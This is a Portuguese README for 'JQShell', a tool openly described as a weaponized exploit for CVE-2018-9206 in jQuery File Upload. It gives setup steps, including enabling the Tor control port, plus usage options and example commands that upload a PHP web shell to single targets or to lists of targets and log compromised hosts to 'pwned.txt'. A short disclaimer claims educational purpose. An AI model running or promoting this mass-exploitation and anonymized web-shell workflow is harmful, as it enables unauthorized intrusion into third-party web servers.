
Ferramenta automatizada de exploração para CVE-2018-9206 (jQuery File Upload) com varredura de alvo único/múltiplo, suporte a proxy Tor e registro de saída para testes de penetração e uso educacional.

JQShell
Uma versão armada do CVE-2018-9206.
Aviso Legal
Usar isto contra servidores que você não controla é ilegal na maioria dos países. O autor não se responsabiliza pelas ações daqueles que usam este software para fins ilegais. Este software é destinado apenas para uso educacional. Nenhum servidor foi ilegalmente comprometido durante a criação deste software.
Funcionalidades
Alvo Único Múltiplos Alvos Tor
Pré-requisitos
Por favor, instale estes pacotes necessários.
Python3
pip3 install requests pysocks subprocess stem
Porta de Controle do Tor
Para usar o Tor neste script, você deve editar seu arquivo torrc e ativar a porta de controle do Tor na 9051.
Normalmente este arquivo está em: /etc/tor/torrc
abra este arquivo e altere esta linha:
#ControlPort 9051
para
ControlPort 9051
restart tor service
Uso
usage: jqshell.py [-h] [-l LIST_INIT] [-t SINGLE_TARGET] -s SHELL_LOC
[-o OUTPUTZ] [-tor]
optional arguments:
-h, --help mostra esta mensagem de ajuda e sai
-l LIST_INIT, --list LIST_INIT
Seleciona uma lista de alvos para explorar
-t SINGLE_TARGET, --target SINGLE_TARGET
Alvo único a ser explorado
-s SHELL_LOC, --shell SHELL_LOC
Isto é obrigatório, coloque o caminho completo para a sua shell
-o OUTPUTZ, --output OUTPUTZ
Caminho completo para onde deseja salvar sua lista de hosts confirmados
-tor, --tor_proxy Selecione se você tem o Tor instalado, será necessário ativar a porta de controle
Exemplos
Executando contra alvo único.
python3 jqshell.py -t http://localhost/folderwerejqueryis -s /var/www/html/shell.php
Executando contra alvo único, com salvamento da saída.
python3 jqshell.py -t https://localhost/folderwerejqueryis -s /var/www/html/shell.php -o pwned.txt
Executando uma lista, com salvamento da saída.
python3 jqshell.py -l /opt/jquery/test.txt -s /var/www/html/shell.php -o pwned.txt
Autor